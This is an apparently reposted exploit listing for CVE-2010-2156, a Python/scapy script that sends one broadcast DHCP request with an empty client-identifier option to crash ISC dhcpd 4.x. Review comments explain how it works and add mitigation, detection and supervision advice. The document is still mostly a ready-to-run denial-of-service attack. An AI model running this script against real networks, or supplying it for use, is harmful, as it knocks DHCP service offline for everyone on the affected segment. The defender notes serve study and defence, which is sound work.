ISC-DHCPD Denial of Service
Posted on 03 July 2010
# ===========================
# ISC-DHCPD Denial of Service
# ===========================
#! /usr/bin/env python
# Exploit title: isc-dhcpd DoS
# Date: 03/07/2010
# Author: sid
# Software Link: https://www.isc.org/software/dhcp
# Version: 4.0.x, 4.1.x, 4.2.x
# CVE: cve-2010-2156
# ps: is possible make a bruteforce on subnet ip address to find a correct value.
#
# NOTE(review): listing reproduced as published, with line breaks restored from
# the collapsed page. It is Python 2 code (string.find, `is` on ints) and it
# depends on scapy.
#
# What the script does: it builds one broadcast DHCP request whose
# client-identifier option ("client_id", DHCP option 61) is an empty string and
# sends it once at layer 2. Per the CVE description, a zero-length client
# identifier makes affected dhcpd builds exit, so the impact is loss of DHCP
# service on the segment until the daemon is restarted.
#
# Defender notes:
#   * Mitigation: run a dhcpd release that ISC lists as fixed for
#     CVE-2010-2156 (see the vendor advisory for the exact version).
#   * Detection: flag DHCP client traffic (UDP 68 -> 67) that carries option 61
#     with length 0; a well-formed client identifier is never empty.
#   * Resilience: supervise dhcpd and alert on unexpected exits, since the
#     visible symptom is the daemon stopping rather than a logged rejection.
#
import sys
import string

# Print usage and stop when no argument was given.
# NOTE(review): `is` tests identity, not equality; it only acts like `==` here
# because CPython caches small integers.
if len(sys.argv) is 1:
    print("Usage: " + sys.argv[0] + "-ip=<legal ip in subnet>")
    print("Example: " + sys.argv[0] + " -ip=192.168.1.100")
    sys.exit(0)

# Scan every argument; for one that starts with "-ip" (string.find returns 0),
# store the text after the first "=" as the module-level name `ip`.
for i in range(len(sys.argv)):
    if string.find(sys.argv[i],"-ip") is 0:
        globals()['ip'] = sys.argv[i].split('=')[1]

from scapy.all import *

# Module-level verbosity threshold read by msg().
globals()['verbose'] = 2

def msg(string, level):
    """Print `string` when the global `verbose` value is at least `level`."""
    if globals()['verbose'] >= level:
        print(string)

msg("attack...",2)

# Packet layers, outermost first:
#   Ether - fixed source MAC, broadcast destination
#   IP    - limited-broadcast destination
#   UDP   - DHCP client port 68 to server port 67
#   BOOTP - ciaddr is the address taken from the command line; the chaddr
#           literal is reproduced exactly as it appears on the page
#   DHCP  - message type "request" plus the empty client_id option, which is
#           the malformed field this CVE is about
p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.255.255.255")/UDP(sport=68,dport=67)/
BOOTP(ciaddr=globals()['ip'],chaddr="xaaxaaxaaxaaxaaxaa")/
DHCP(options=[("message-type","request"),("client_id",""),("end")]))

# Dump the assembled layers before sending.
# NOTE(review): indentation was lost on the page; sendp() is placed outside the
# `if` here - confirm against the original listing.
if p:
    p.show()
sendp(p)
#EOF

# Source: Inj3ct0r.com (http://inj3ct0r.com/) [2010-07-03]